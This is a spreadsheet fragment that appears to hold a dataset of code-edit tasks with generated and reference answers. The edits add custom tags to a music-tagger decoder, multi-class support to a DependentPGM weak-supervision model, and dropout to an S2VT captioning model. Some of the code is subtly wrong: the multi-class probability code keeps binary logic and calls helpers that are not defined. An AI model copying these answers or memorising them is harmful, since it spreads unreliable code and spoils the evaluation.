dim_ordering in {'tf', 'th'}\n\n    if librosa_exists():\n        import librosa\n    else:\n        raise RuntimeError('Librosa is required to process audio files.\\n' +\n                           'Install it via `pip install librosa` \\nor visit ' +\n                           'http://librosa.github.io/librosa/ for details.')\n\n    # mel-spectrogram parameters\n    SR = 12000\n    N_FFT = 512\n    N_MELS = 96\n    HOP_LEN = 256\n    DURA = 29.12\n\n    src, sr = librosa.load(audio_path, sr=SR)\n    n_sample = src.shape[0]\n    n_sample_wanted = int(DURA * SR)\n\n    # trim the signal at the center\n    if n_sample &lt; n_sample_wanted:  # if too short\n        src = np.hstack((src, np.zeros((int(DURA * SR) - n_sample,))))\n    elif n_sample &gt; n_sample_wanted:  # if too long\n        src = src[(n_sample - n_sample_wanted) / 2:\n                  (n_sample + n_sample_wanted) / 2]\n\n    logam = librosa.logamplitude\n    melgram = librosa.feature.melspectrogram\n    x = logam(melgram(y=src, sr=SR, hop_length=HOP_LEN,\n                      n_fft=N_FFT, n_mels=N_MELS) ** 2,\n              ref_power=1.0)\n\n    if dim_ordering == 'th':\n        x = np.expand_dims(x, axis=0)\n    elif dim_ordering == 'tf':\n        x = np.expand_dims(x, axis=3)\n    return x\n\n\n#Modify\ndef decode_predictions(preds, top_n=5, custom_tags=None):\n    '''Decode the output of a music tagger model.\n\n    # Arguments\n        preds: 2-dimensional numpy array\n        top_n: integer in [0, 50], number of items to show\n        custom_tags: optional list of custom tags to use instead of default TAGS\n\n    '''\n    #New\n    tags_to_use = custom_tags if custom_tags is not None else TAGS\n    \n    assert len(preds.shape) == 2 and preds.shape[1] == len(tags_to_use)\n    results = []\n    for pred in preds:\n        result = zip(tags_to_use, pred)\n        result = sorted(result, key=lambda x: x[1], reverse=True)\n        results.append(result[:top_n])\n    return results"}</t>
  </si>
  <si>
    <t>{'file1': "#Modify\ndef decode_predictions(preds, top_n=5, custom_tags=None):\n    '''Decode the output of a music tagger model.\n\n    # Arguments\n        preds: 2-dimensional numpy array\n        top_n: integer in [0, 50], number of items to show\n        custom_tags: list of custom tags to use for decoding (optional)\n\n    '''\n    assert len(preds.shape) == 2 and preds.shape[1] == 50\n    if custom_tags:\n        assert len(custom_tags) == 50, 'Custom tags must have exactly 50 items'\n        tags = custom_tags\n    else:\n        tags = TAGS\n    results = []\n    for pred in preds:\n        result = zip(tags, pred)\n        result = sorted(result, key=lambda x: x[1], reverse=True)\n        results.append(result[:top_n])\n    return results", 'file2': "#Modify\nif __name__ == '__main__':\n    model = MusicTaggerCRNN(weights='msd')\n\n    audio_path = 'audio_file.mp3'\n    melgram = preprocess_input(audio_path)\n    melgrams = np.expand_dims(melgram, axis=0)\n\n    preds = model.predict(melgrams)\n    print('Predicted:')\n    #New\n    custom_tags = ['tag1', 'tag2', 'tag3', 'tag4', 'tag5', 'tag6', 'tag7', 'tag8', 'tag9', 'tag10', 'tag11', 'tag12', 'tag13', 'tag14', 'tag15', 'tag16', 'tag17', 'tag18', 'tag19', 'tag20', 'tag21', 'tag22', 'tag23', 'tag24', 'tag25', 'tag26', 'tag27', 'tag28', 'tag29', 'tag30', 'tag31', 'tag32', 'tag33', 'tag34', 'tag35', 'tag36', 'tag37', 'tag38', 'tag39', 'tag40', 'tag41', 'tag42', 'tag43', 'tag44', 'tag45', 'tag46', 'tag47', 'tag48', 'tag49', 'tag50']\n    print(decode_predictions(preds, custom_tags=custom_tags))"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class DependentPGM with methods __init__, _get_accs_and_cb, get_clique_probs, get_cond_probs, get_probs, evaluate', 'invoking_code_segment': 'Aggregator class methods that instantiate and call DependentPGM, specifically in junction_tree method and related probability computation methods', 'feature_description': 'Add multi-class classification support to DependentPGM by extending the class to handle k-way classification (k &gt; 2) instead of only binary classification. This includes modifying accuracy computation, conditional probability calculations, and inference methods to work with arbitrary number of classes.', 'modified_complete_code': '# File 1: ama_prompting/boosting/binary_deps.py - MODIFIED\n\nimport networkx as nx\nimport numpy as np\nfrom itertools import chain, product, combinations\nfrom scipy.sparse import issparse\nimport more_itertools\nimport torch\n\nclass DependentPGM:\n    """This class describes a PGM learned from labeled data with specified edge structure.\n    \n    Args: \n        edges: list of edges that are dependent\n        train_votes: n x m array of votes in {0, 1, ..., k-1}\n        train_gold: n array of true labels in {0, 1, ..., k-1}\n        classes: list of class labels (default [0, 1])\n    """\n    def __init__(self, edges, train_votes, train_gold, abstains=False, classes=[0, 1], abstain_value=-1) -&gt; None:\n        """Initialize the PGM by computing its junction tree factorization and LF accuracy."""\n        \n        self.edges = edges\n        self.train_votes = train_votes \n        self.train_gold = train_gold\n        \n        #Modify: Support arbitrary number of classes\n        self.classes = sorted(np.unique(train_gold).tolist()) if classes is None else sorted(classes)\n        self.k = len(self.classes)\n        assert len(np.unique(self.train_gold)) &lt;= self.k\n        \n        self.abstains = abstains\n        assert len(np.unique(self.train_votes)) == int(abstains) + self.k \n        self.abstain_value = abstain_value\n        \n        self.n, self.m = self.train_votes.shape\n        self.nodes = np.arange(self.m) \n        self.higher_order = len(edges) != 0\n        \n        self._set_clique_tree()\n        self._set_clique_data()\n        self._get_accs_and_cb()\n    \n    def _get_scaled(self):\n        """Scale votes and gold labels for binary classification."""\n        if self.classes == [0, 1]:\n            self.train_votes_scaled = 2*self.train_votes - 1\n            self.train_gold_scaled = 2*self.train_gold - 1\n            if self.abstains:\n                self.train_votes_scaled[self.train_votes == self.abstain_value] = 0\n        else:\n            self.train_votes_scaled = self.train_votes\n            self.train_gold_scaled = self.train_gold\n    \n    def _set_clique_tree(self):\n        """Construct junction tree from dependency graph."""\n        G1 = nx.Graph()\n        G1.add_nodes_from(self.nodes)\n        G1.add_edges_from(self.edges)\n        \n        if not nx.is_chordal(G1):\n            raise nx.NetworkXError("Graph triangulation not implemented.")\n        \n        G2 = nx.Graph()\n        for i, c in enumerate(nx.chordal_graph_cliques(G1)):\n            G2.add_node(i, members=c)\n        for i in G2.nodes():\n            for j in G2.nodes():\n                S = G2.nodes[i]["members"].intersection(G2.nodes[j]["members"])\n                w = len(S)\n                if w &gt; 0:\n                    G2.add_edge(i, j, weight=w, members=S)\n        \n        self.c_tree = nx.maximum_spanning_tree(G2)\n    \n    def _set_clique_data(self):\n        """Create helper data structure for cliques."""\n        self.c_data = dict()\n        for i in range(self.m):\n            self.c_data[i] = {\n                "vertices": [i],\n                "max_cliques": set([j for j in self.c_tree.nodes() if i in self.c_tree.nodes[j]["members"]]),\n            }\n        \n        if self.higher_order:\n            counter = 0\n            for item in chain(self.c_tree.nodes(), self.c_tree.edges()):\n                if isinstance(item, int):\n                    C = self.c_tree.nodes[item]\n                    C_type = "node"\n                elif isinstance(item, tuple):\n                    C = self.c_tree[item[0]][item[1]]\n                    C_type = "edge"\n                else:\n                    raise ValueError(item)\n                members = list(C["members"])\n                nc = len(members)\n                \n                if nc != 1:\n                    self.c_data[tuple(members)] = {\n                        "vertices": members,\n                        "max_cliques": set([item]) if C_type == "node" else set(item),\n                    }\n                    counter += 1\n    \n    def _get_accs_and_cb(self):\n        """Compute LF accuracies and class balance for multi-class setting."""\n        #Modify: Support k-way classification\n        self.gold_idxs = [np.where(self.train_gold == c)[0] for c in self.classes]\n        \n        #Modify: accs shape is now (m, k) for k classes\n        self.accs = np.zeros((self.m, self.k))\n        for p in range(self.m):\n            for i, c in enumerate(self.classes):\n                if len(self.gold_idxs[i]) &gt; 0:\n                    self.accs[p, i] = len(np.where(self.train_votes[self.gold_idxs[i], p] == c)[0]) / len(self.gold_idxs[i])\n        \n        self.accs = np.clip(self.accs, 0.0001, 0.9999)\n        #Modify: class balance is now a vector of k probabilities\n        self.balance = np.array([len(self.gold_idxs[i]) / self.n for i in range(self.k)])\n    \n    def get_clique_probs(self, idxs, vals, y):\n        """Compute marginal probability Pr(votes_idxs = vals | y) for multi-class."""\n        y_idx = self.classes.index(y) if y in self.classes else 0\n        truth_matrix = np.ones(len(self.gold_idxs[y_idx])).astype(bool)\n        for i, lf in enumerate(idxs):\n            truth_matrix = np.logical_and(truth_matrix, self.train_votes[self.gold_idxs[y_idx], lf] == vals[i])\n        \n        count = len(np.where(truth_matrix == True)[0])\n        if count == 0:\n            return 0.00001\n        return count / len(self.gold_idxs[y_idx])\n    \n    def get_cond_probs(self, votes, y):\n        """Compute probability Pr(votes | y) for multi-class classification."""\n        y_idx = self.classes.index(y) if y in self.classes else 0\n        #Modify: Use class balance vector\n        pr_y = self.balance[y_idx]\n        prod = pr_y\n        \n        for i in self.c_tree.nodes():\n            node = self.c_tree.nodes[i]\n            members = list(node[\'members\'])\n            if len(members) == 1:\n                v = members[0]\n                #Modify: Index into accs with class index\n                prod *= votes[v] * self.accs[v, y_idx] + (1 - votes[v]) * (1 - self.accs[v, y_idx])\n            else:\n                prod *= self.get_clique_probs(members, votes[members], y)\n        \n        for i in self.c_tree.edges():\n            edge = self.c_tree.edges[i]\n            members = list(edge[\'members\'])\n            if len(members) == 1:\n                v = members[0]\n                deg = len(self.c_data[v][\'max_cliques\'])\n                prod /= (votes[v] * self.accs[v, y_idx] + (1 - votes[v]) * (1 - self.accs[v, y_idx]))**(deg-1)\n            else:\n                deg = len(self.c_data[tuple(members)][\'max_cliques\'])\n                prod /= (self.get_clique_probs(members, votes[members], y))**(deg-1)\n        \n        return prod\n    \n    def get_probs(self, votes):\n        """Compute probability Pr(y | votes) for all classes."""\n        #New: Return probability distribution over all classes\n        probs = np.zeros(self.k)\n        for i, c in enumerate(self.classes):\n            probs[i] = self.get_cond_probs(votes, c)\n        \n        total = np.sum(probs)\n        if total == 0:\n            return np.ones(self.k) / self.k\n        return probs / total\n    \n    def evaluate(self, test_votes, test_gold):\n        """Evaluate PGM on test data for multi-class classification."""\n        n_test = len(test_votes)\n        \n        output_probs = np.zeros((n_test, self.k))\n        output_rounded = np.zeros(n_test)\n        err = 0\n        \n        for i in range(n_test):\n            output_probs[i] = self.get_probs(test_votes[i])\n            output_rounded[i] = self.classes[np.argmax(output_probs[i])]\n            err += output_rounded[i] != test_gold[i]\n        \n        accuracy = 1 - err / n_test\n        return output_probs, output_rounded, accuracy\n\n\ndef is_triangulated(nodes, edges):\n    """Check if a graph is triangulated (chordal)."""\n    G1 = nx.Graph()\n    G1.add_nodes_from(nodes)\n    G1.add_edges_from(edges)\n    return nx.is_chordal(G1)\n\n\ndef structure_learning(m, votes, gold, acc_theta, classes=[0, 1], l1_lambda=0.2):\n    """Structure learning algorithm supporting multi-class classification."""\n    classes = np.sort(np.unique(gold))\n    vote_classes = np.sort(np.unique(votes))\n    \n    if 0 in classes and 1 in classes:\n        votes_scaled = 2*votes - 1\n        gold_scaled = 2*gold - 1\n        if len(vote_classes) == len(classes) + 1:\n            votes_scaled[votes == -1] = 0\n    else:\n        votes_scaled = votes \n        gold_scaled = gold\n    \n    acc_theta = torch.from_numpy(acc_theta).type(torch.FloatTensor) \n    all_thetas = np.zeros((m, m))\n    \n    for v in range(m):\n        print(f"Learning neighborhood of vertex {v}.")\n        if len(classes) == 2:\n            big_theta = learn_neighborhood(m, v, votes_scaled, gold_scaled, acc_theta, l1_lambda)\n        else:\n            big_theta = learn_neighborhood_multi(m, v, votes_scaled, gold_scaled, acc_theta, l1_lambda, classes)\n        all_thetas[v] = big_theta\n    \n    return all_thetas\n\n\ndef learn_neighborhood(m, vertex, votes, gold, accs, l1_lambda, epochs=50000):\n    """Learn neighborhood graph for binary classification."""\n    n = len(gold)\n    vote_y = np.concatenate((votes, gold.reshape(n, 1)), axis=1)\n    \n    xr = vote_y[:, vertex]\n    x_notr = np.delete(vote_y, vertex, axis=1)\n    \n    xr = torch.from_numpy(xr).type(torch.FloatTensor)\n    x_notr = torch.from_numpy(x_notr).type(torch.FloatTensor)\n    \n    theta = torch.zeros(m)\n    theta[m - 1] = accs[vertex]\n    theta.requires_grad_()\n    \n    optimizer = torch.optim.SGD([theta], lr=0.0001)\n    for t in range(epochs):\n        optimizer.zero_grad()\n        \n        fx = (torch.log(torch.exp(torch.matmul(x_notr, theta)) + torch.exp(-torch.matmul(x_notr, theta))).mean())\n        loss = fx - torch.multiply(xr, x_notr.T).mean(dim=1).dot(theta) + l1_lambda * torch.linalg.vector_norm(theta[:m], ord=1)\n        \n        loss.backward()\n        optimizer.step()\n    \n    big_theta = np.concatenate([theta.detach().numpy()[:vertex], [0], theta.detach().numpy()[vertex:m - 1]])\n    return big_theta\n\n\ndef learn_neighborhood_multi(m, vertex, votes, gold, accs, l1_lambda, classes, epochs=50000):\n    """Learn neighborhood graph for multi-class classification."""\n    n = len(gold)\n    vote_y = np.concatenate((votes, gold.reshape(n, 1)), axis=1)\n    \n    xr = vote_y[:, vertex]\n    x_notr = np.delete(vote_y, vertex, axis=1)\n    \n    xr = torch.from_numpy(xr).type(torch.FloatTensor)\n    x_notr = torch.from_numpy(x_notr).type(torch.FloatTensor)\n    \n    theta = torch.zeros(m)\n    theta[m - 1] = accs[vertex]\n    theta.requires_grad_()\n    \n    optimizer = torch.optim.SGD([theta], lr=0.0001)\n    for t in range(epochs):\n        optimizer.zero_grad()\n        \n        mu = 0\n        for i in range(x_notr.shape[1]):\n            mu += (2*(xr == x_notr[:, i])-1).type(torch.FloatTensor).mean() * theta[i]\n        \n        fx = 0\n        for k in classes:\n            fx += torch.exp(torch.matmul((2*(x_notr == k)-1).type(torch.FloatTensor), theta)).mean()\n        \n        loss = fx - mu + l1_lambda * torch.linalg.vector_norm(theta[:m], ord=1)\n        \n        loss.backward()\n        optimizer.step()\n    \n    big_theta = np.concatenate([theta.detach().numpy()[:vertex], [0], theta.detach().numpy()[vertex:m - 1]])\n    return big_theta\n\n\ndef main():\n    vote_arr_train = np.load(\'./data/youtube-spam/train_votes.npy\').T\n    vote_arr_test = np.load(\'./data/youtube-spam/test_votes.npy\').T\n    gold_arr_train = np.load(\'./data/youtube-spam/train_gold.npy\').T\n    gold_arr_test = np.load(\'./data/youtube-spam/test_gold.npy\').T\n    \n    n_train, num_prompts = vote_arr_train.shape\n    \n    np.random.seed(4)\n    val_idxs = np.random.choice(np.arange(n_train), size=28, replace=False)\n    vote_arr_val = vote_arr_train[val_idxs, :]\n    vote_arr_train = np.delete(vote_arr_train, val_idxs, axis=0)\n    \n    gold_arr_val = gold_arr_train[val_idxs]\n    gold_arr_train = np.delete(gold_arr_train, val_idxs)\n    \n    nodes = np.arange(num_prompts)\n    \n    all_edges = list(combinations(nodes, 2))\n    small_edgesets = list(more_itertools.powerset(all_edges))\n    scores = np.zeros(len(small_edgesets))\n    \n    for i, edgeset in enumerate(small_edgesets):\n        if len(edgeset) &gt; 4:\n            break\n        if not is_triangulated(nodes, edgeset):\n            continue\n        model = DependentPGM(edgeset, vote_arr_train, gold_arr_train)\n        \n        probs, output, scores[i] = model.evaluate(vote_arr_val, gold_arr_val)\n        if i % 100 == 0:\n            print(f"Edgeset: {edgeset} \\n score: {scores[i]}")\n    \n    print(f"Best edgeset score: {scores.max()}")\n    print(f"Best edgeset: {small_edgesets[scores.argmax()]}")\n    \n    edges = small_edgesets[scores.argmax()]\n    \n    vote_arr_train = np.concatenate((vote_arr_train, vote_arr_val))\n    gold_arr_train = np.concatenate((gold_arr_train, gold_arr_val))\n    \n    model = DependentPGM(edges, vote_arr_train, gold_arr_train)\n    probs, output, acc = model.evaluate(vote_arr_test, gold_arr_test)\n    print(f"Final model accuracy: {acc}")\n\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t xml:space="preserve">#file 1: binary_deps.py
import numpy as np
import networkx as nx
from itertools import chain
class DependentPGM:
    def __init__(self, edges, train_votes, train_gold, abstains = False, classes = [0, 1], abstain_value = -1) -&gt; None:
        self.edges = edges
        self.train_votes = train_votes 
        self.train_gold = train_gold
        self.classes = classes
        self.k = len(classes)
        assert len(np.unique(self.train_gold)) == self.k 
        self.abstains = abstains
        assert len(np.unique(self.train_votes)) == int(abstains) + self.k 
        self.abstain_value = abstain_value
        self.n, self.m = self.train_votes.shape
        self.nodes = np.arange(self.m) 
        self.higher_order = len(edges) != 0
        # construct data structures containing dependency graph information (maximal cliques and separator sets)
        self._set_clique_tree()
        self._set_clique_data()
        # compute LF accuracies and class balance
        self._get_accs_and_cb()
    def _get_accs_and_cb(self):
        self.gold_idxs = [np.where(self.train_gold == c)[0] for c in self.classes]
        self.accs = np.zeros((self.m, self.k, self.k)) # [i, j, k] = Pr(prompt_i = j| y = k)
        for p in range(self.m):
            for i in range(self.k):
                for j in range(self.k):
                    self.accs[p, i, j] = len(np.where(self.train_votes[self.gold_idxs[i], p] == j)[0]) / len(self.gold_idxs[i])
        self.accs = np.clip(self.accs, 0.0001, 0.9999)       
        self.balance = [len(self.gold_idxs[i]) / self.n for i in range(self.k)]
    def get_cond_probs(self, votes, y):
        pr_y = self.balance[y]
        prod = pr_y
        for i in self.c_tree.nodes():
            node = self.c_tree.nodes[i]
            members = list(node['members'])
            if len(members) == 1:
                v = members[0]
                prod *= self.accs[v, y, votes[v]]
            else:
                member_votes = np.append(votes[members], y)
                members = [[m] for m in members] + [[self.m]]
                clique_probs = self.joint_p(members, member_votes)/self.joint_p([[self.m]], [y])
                prod *= clique_probs
        for i in self.c_tree.edges():
            edge = self.c_tree.edges[i]
            members = list(edge['members'])
            if len(members) == 1:
                v = members[0]
                deg = len(self.c_data[v]['max_cliques'])
                prod /= (self.accs[v, y, votes[v]])**(deg-1)
            else:
                deg = len(self.c_data[tuple(members)]['max_cliques'])
                member_votes = np.concatenate(votes[members], y)
                members = [[m] for m in members] + [[self.m]]
                clique_probs = self.joint_p(members, member_votes)/self.joint_p([[self.m]], [y])
                prod /= clique_probs**(deg-1)
        return prod 
    def get_probs(self, votes):
        probs = np.zeros(self.k)
        for y in range(self.k):
            probs[y] = self.get_cond_probs(votes, y)
        return probs / probs.sum()
#New: Add a method to handle multi-class classification
    def evaluate(self, test_votes, test_gold):
        n_test = len(test_votes)
        output_probs = np.zeros((n_test, self.k))
        output_rounded = np.zeros(n_test)
        err = 0
        for i in range(n_test):
            output_probs[i] = self.get_probs(test_votes[i])
            output_rounded[i] = np.argmax(output_probs[i])
            err += output_rounded[i] != test_gold[i]
        accuracy = 1 - err / n_test
        return output_probs, output_rounded, accuracy
#file 2: make_pgm.py
from binary_deps import DependentPGM
import numpy as np
# specify edgeset
# edges =[(0, 1)]
#model = DependentPGM(edges, vote_arr_train, gold_arr_train)
#probs, output, acc = model.evaluate(vote_arr_test, gold_arr_test)
#print(acc)
#Modify: Update the code to handle multi-class classification
vote_arr_train = np.load('./data/youtube-spam/train_votes.npy').T
vote_arr_test = np.load('./data/youtube-spam/test_votes.npy').T
gold_arr_train = np.load('./data/youtube-spam/train_gold.npy').T
gold_arr_test = np.load('./data/youtube-spam/test_gold.npy').T
# vote_arr_train = np.concatenate((vote_arr_train[:, 0: 2], vote_arr_train[:, 4:]), axis=1)
# vote_arr_test = np.concatenate((vote_arr_test[:, 0: 2], vote_arr_test[:, 4:]), axis=1)
n_train, num_prompts = vote_arr_train.shape
# make validation set 
np.random.seed(4)
val_idxs = np.random.choice(np.arange(n_train), size= 28, replace=False)
vote_arr_val = vote_arr_train[val_idxs, :]
vote_arr_train = np.delete(vote_arr_train, val_idxs, axis=0)
gold_arr_val = gold_arr_train[val_idxs]
gold_arr_train = np.delete(gold_arr_train, val_idxs)
nodes = np. arange(num_prompts) 
# specify edgeset
# edges =[(0, 1)]
#model = DependentPGM(edges, vote_arr_train, gold_arr_train)
#probs, output, acc = model.evaluate(vote_arr_test, gold_arr_test)
#print(acc)
#Modify: Update the code to handle multi-class classification
classes = np.unique(gold_arr_train)
model = DependentPGM([], vote_arr_train, gold_arr_train, classes=classes)
probs, output, acc = model.evaluate(vote_arr_test, gold_arr_test)
print(acc)
</t>
  </si>
  <si>
    <t>{'called_code_segment': 'S2VTModel.__init__ method and forward method', 'invoking_code_segment': 'main function where S2VTModel is instantiated with parameters', 'feature_description': 'Add dropout layers after RNN layers in S2VTModel to prevent overfitting during training. The dropout is applied to the outputs of both rnn1 and rnn2 layers in the forward pass.', 'modified_complete_code': '# File 1: video-caption.pytorch/models/S2VTModel.py\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nimport random\nfrom torch.autograd import Variable\n\nclass S2VTModel(nn.Module):\n    def __init__(self, vocab_size, max_len, dim_hidden, dim_word, dim_vid=2048, sos_id=1, eos_id=0,\n                 n_layers=1, rnn_cell=\'gru\', rnn_dropout_p=0.2):\n        super(S2VTModel, self).__init__()\n        if rnn_cell.lower() == \'lstm\':\n            self.rnn_cell = nn.LSTM\n        elif rnn_cell.lower() == \'gru\':\n            self.rnn_cell = nn.GRU\n        self.rnn1 = self.rnn_cell(dim_vid, dim_hidden, n_layers,\n                                  batch_first=True, dropout=rnn_dropout_p)\n        self.rnn2 = self.rnn_cell(dim_hidden + dim_word, dim_hidden, n_layers,\n                                  batch_first=True, dropout=rnn_dropout_p)\n        # #New: Add dropout layers after RNN outputs\n        self.dropout1 = nn.Dropout(p=rnn_dropout_p)\n        self.dropout2 = nn.Dropout(p=rnn_dropout_p)\n        self.dim_vid = dim_vid\n        self.dim_output = vocab_size\n        self.dim_hidden = dim_hidden\n        self.dim_word = dim_word\n        self.max_length = max_len\n        self.sos_id = sos_id\n        self.eos_id = eos_id\n        self.embedding = nn.Embedding(self.dim_output, self.dim_word)\n        self.out = nn.Linear(self.dim_hidden, self.dim_output)\n\n    def forward(self, vid_feats, target_variable=None,\n                mode=\'train\', opt={}):\n        batch_size, n_frames, _ = vid_feats.shape\n        padding_words = Variable(vid_feats.data.new(batch_size, n_frames, self.dim_word)).zero_()\n        padding_frames = Variable(vid_feats.data.new(batch_size, 1, self.dim_vid)).zero_()\n        state1 = None\n        state2 = None\n        output1, state1 = self.rnn1(vid_feats, state1)\n        # #New: Apply dropout after rnn1\n        output1 = self.dropout1(output1)\n        input2 = torch.cat((output1, padding_words), dim=2)\n        output2, state2 = self.rnn2(input2, state2)\n        # #New: Apply dropout after rnn2\n        output2 = self.dropout2(output2)\n        seq_probs = []\n        seq_preds = []\n        if mode == \'train\':\n            for i in range(self.max_length - 1):\n                current_words = self.embedding(target_variable[:, i])\n                self.rnn1.flatten_parameters()\n                self.rnn2.flatten_parameters()\n                output1, state1 = self.rnn1(padding_frames, state1)\n                # #New: Apply dropout after rnn1\n                output1 = self.dropout1(output1)\n                input2 = torch.cat(\n                    (output1, current_words.unsqueeze(1)), dim=2)\n                output2, state2 = self.rnn2(input2, state2)\n                # #New: Apply dropout after rnn2\n                output2 = self.dropout2(output2)\n                logits = self.out(output2.squeeze(1))\n                logits = F.log_softmax(logits, dim=1)\n                seq_probs.append(logits.unsqueeze(1))\n            seq_probs = torch.cat(seq_probs, 1)\n        else:\n            current_words = self.embedding(\n                Variable(torch.LongTensor([self.sos_id] * batch_size)).cuda())\n            for i in range(self.max_length - 1):\n                self.rnn1.flatten_parameters()\n                self.rnn2.flatten_parameters()\n                output1, state1 = self.rnn1(padding_frames, state1)\n                # #New: Apply dropout after rnn1\n                output1 = self.dropout1(output1)\n                input2 = torch.cat(\n                    (output1, current_words.unsqueeze(1)), dim=2)\n                output2, state2 = self.rnn2(input2, state2)\n                # #New: Apply dropout after rnn2\n                output2 = self.dropout2(output2)\n                logits = self.out(output2.squeeze(1))\n                logits = F.log_softmax(logits, dim=1)\n                seq_probs.append(logits.unsqueeze(1))\n                _, preds = torch.max(logits, 1)\n                current_words = self.embedding(preds)\n                seq_preds.append(preds.unsqueeze(1))\n            seq_probs = torch.cat(seq_probs, 1)\n            seq_preds = torch.cat(seq_preds, 1)\n        return seq_probs, seq_preds\n\n# File 2: video-caption.pytorch/train.py\n# No modifications needed in train.py as the dropout is now handled internally in S2VTModel\n# The instantiation remains the same:\n# model = S2VTModel(\n#     opt["vocab_size"],\n#     opt["max_len"],\n#     opt["dim_hidden"],\n#     opt["dim_word"],\n#     opt[\'dim_vid\'],\n#     rnn_cell=opt[\'rnn_type\'],\n#     n_layers=opt[\'num_layers\'],\n#     rnn_dropout_p=opt["rnn_dropout_p"])\n# The rnn_dropout_p parameter is now used for both RNN internal dropout and the new dropout layers'}</t>
  </si>
  <si>
    <t>models/S2VTModel.py:
#Modify
class S2VTModel(nn.Module):
    def __init__(self, vocab_size, max_len, dim_hidden, dim_word, dim_vid=2048, sos_id=1, eos_id=0,
                 n_layers=1, rnn_cell='gru', rnn_dropout_p=0.2, dropout_p=0.5):
        super(S2VTModel, self).__init__()
        if rnn_cell.lower() == 'lstm':
            self.rnn_cell = nn.LSTM
        elif rnn_cell.lower() == 'gru':
            self.rnn_cell = nn.GRU
        self.rnn1 = self.rnn_cell(dim_vid, dim_hidden, n_layers,
                                  batch_first=True, dropout=rnn_dropout_p)
        self.dropout1 = nn.Dropout(dropout_p) #New
        self.rnn2 = self.rnn_cell(dim_hidden + dim_word, dim_hidden, n_layers,
                                  batch_first=True, dropout=rnn_dropout_p)
        self.dropout2 = nn.Dropout(dropout_p) #New
        self.dim_vid = dim_vid
        self.dim_output = vocab_size
        self.dim_hidden = dim_hidden
        self.dim_word = dim_word
        self.max_length = max_len
        self.sos_id = sos_id
        self.eos_id = eos_id
        self.embedding = nn.Embedding(self.dim_output, self.dim_word)
        self.out = nn.Linear(self.dim_hidden, self.dim_output)
    def forward(self, vid_feats, target_variable=None,
                mode='train', opt={}):
        batch_size, n_frames, _ = vid_feats.shape
        padding_words = Variable(vid_feats.data.new(batch_size, n_frames, self.dim_word)).zero_()
        padding_frames = Variable(vid_feats.data.new(batch_size, 1, self.dim_vid)).zero_()
        state1 = None
        state2 = None
        #self.rnn1.flatten_parameters()
        #self.rnn2.flatten_parameters()
        output1, state1 = self.rnn1(vid_feats, state1)
        output1 = self.dropout1(output1) #New
        input2 = torch.cat((output1, padding_words), dim=2)
        output2, state2 = self.rnn2(input2, state2)
        output2 = self.dropout2(output2) #New
        seq_probs = []
        seq_preds = []
        if mode == 'train':
            for i in range(self.max_length - 1):
                # &lt;eos&gt; doesn't input to the network
                current_words = self.embedding(target_variable[:, i])
                self.rnn1.flatten_parameters()
                self.rnn2.flatten_parameters()
                output1, state1 = self.rnn1(padding_frames, state1)
                output1 = self.dropout1(output1) #New
                input2 = torch.cat(
                    (output1, current_words.unsqueeze(1)), dim=2)
                output2, state2 = self.rnn2(input2, state2)
                output2 = self.dropout2(output2) #New
                logits = self.out(output2.squeeze(1))
                logits = F.log_softmax(logits, dim=1)
                seq_probs.append(logits.unsqueeze(1))
            seq_probs = torch.cat(seq_probs, 1)
        else:
            current_words = self.embedding(Variable(torch.LongTensor([self.sos_id] * batch_size)).cuda())
            for i in range(self.max_length - 1):
                self.rnn1.flatten_parameters()
                self.rnn2.flatten_parameters()
                output1, state1 = self.rnn1(padding_frames, state1)
                output1 = self.dropout1(output1) #New
                input2 = torch.cat(
                    (output1, current_words.unsqueeze(1)), dim=2)
                output2, state2 = self.rnn2(input2, state2)
                output2 = self.dropout2(output2) #New
                logits = self.out(output2.squeeze(1))
                logits = F.log_softmax(logits, dim=1)
                seq_probs.append(logits.unsqueeze(1))
                _, preds = torch.max(logits, 1)
                current_words = self.embedding(preds)
                seq_preds.append(preds.unsqueeze(1))
            seq_probs = torch.cat(seq_probs, 1)
            seq_preds = torch.cat(seq_preds, 1)
        return seq_probs, seq_preds
train.py:
#Modify
def main(opt):
    dataset = VideoDataset(opt, 'train')
    dataloader = DataLoader(dataset, batch_size=opt["batch_size"], shuffle=True)
    opt["vocab_size"] = dataset.get_vocab_size()
    if opt["model"] == 'S2VTModel':
        model = S2VTModel(
            opt["vocab_size"],
            opt["max_len"],
            opt["dim_hidden"],
            opt["dim_word"],
            opt['dim_vid'],
            rnn_cell=opt['rnn_type'],
            n_layers=opt['num_layers'],
            rnn_dropout_p=opt["rnn_dropout_p"],
            dropout_p=opt["dropout_p"] #New
        )
    elif opt["model"] == "S2VTAttModel":
        encoder = EncoderRNN(
            opt["dim_vid"],
            opt["dim_hidden"],
            bidirectional=opt["bidirectional"],
            input_dropout_p=opt["input_dropout_p"],
            rnn_cell=opt['rnn_type'],
            rnn_dropout_p=opt["rnn_dropout_p"])
        decoder = DecoderRNN(
            opt["vocab_size"],
            opt["max_len"],
            opt["dim_hidden"],
            opt["dim_word"],
            input_dropout_p=opt["input_dropout_p"],
            rnn_cell=opt['rnn_type'],
            rnn_dropout_p=opt["rnn_dropout_p"],
            bidirectional=opt["bidirectional"])
        model = S2VTAttModel(encoder, decoder)
    model = model.cuda()
    crit = utils.LanguageModelCriterion()
    rl_crit = utils.RewardCriterion()
    optimizer = optim.Adam(
        model.parameters(),
        lr=opt["learning_rate"],
        weight_decay=opt["weight_decay"])
    exp_lr_scheduler = optim.lr_scheduler.StepLR(
        optimizer,
        step_size=opt["learning_rate_decay_every"],
        gamma=opt["learning_rate_decay_rate"])
    train(dataloader, model, crit, optimizer, exp_lr_scheduler, opt, rl_crit)</t>
  </si>
  <si>
